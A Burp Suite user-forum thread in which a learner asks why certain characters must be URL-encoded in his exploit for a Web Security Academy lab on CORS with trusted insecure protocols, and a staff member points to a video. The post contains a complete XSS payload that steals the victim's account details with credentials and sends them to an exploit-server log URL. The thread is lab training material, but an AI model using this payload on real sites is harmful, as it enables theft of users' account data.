Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Weird need for URL encoding in XSS in CORS lab

Jaak | Last updated: Jun 29, 2022 09:20PM UTC

Hello, I have been doing the "Lab: CORS vulnerability with trusted insecure protocols". I think I understand the vulnerability pretty well, however, I had trouble getting the exploit to work until I looked at the solution. There seems to be a weird need (perhaps not so weird after all since it works but I have no clue why). In any case, this is the exploit script I tried (which I basically copied from https://portswigger.net/web-security/cors): <script> document.location="http://stock.0ac6004f04a7eb44c01967d300f600e5.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0ac6004f04a7eb44c01967d300f600e5.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send();function reqListener() {location='https://exploit-0ab400600418eb7bc09e672e01250004.web-security-academy.net/log?key='+this.responseText;};</script>&storeId=1" </script> Notice the last part: "{location='https://exploit-0ab400600418eb7bc09e672e01250004.web-security-academy.net/log?key='+this.responseText;};</script>" This exploit didnt work. However, in the solution, the exploit is exactly the same except for one '+' and one '<' url encoded in the last part mentioned above: "{location='https://exploit-0ab400600418eb7bc09e672e01250004.web-security-academy.net/log?key='%2bthis.responseText;};%3c/script>" Both need to be url encoded in order for the exploit to work. If the '<' isnt url encoded, the XSS doesnt work at all, meaning theres no "script" in the response html. If the '+' isnt url encoded, the XSS does work in theory but doesnt properly append the 'this.responseText' to the url. Now, I googled a little and I guess the plus sign must be url encoded since 'the plus sign is used as shorthand for a space in query parameters'. But I can not make any sense of why the '<' needs to be url encoded? I have tried around a little and it seems like either the '<' or the '>' of the '/script' tag needs to be url encoded. Does anybody know an answer to this? It seems like this is an issue worth understanding for any XSS challenges. Would be very appreciated :)

Ben, PortSwigger Agent | Last updated: Jul 01, 2022 07:03AM UTC

Hi Jaak, Rana has a good video explaining her methodology here: https://www.youtube.com/watch?v=pYw6lciCBCw She uses a slightly different solution to the written solution. However, the methodology and reasoning behind what she is doing is the same, and she explains why she needs to URL-encode specific characters.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.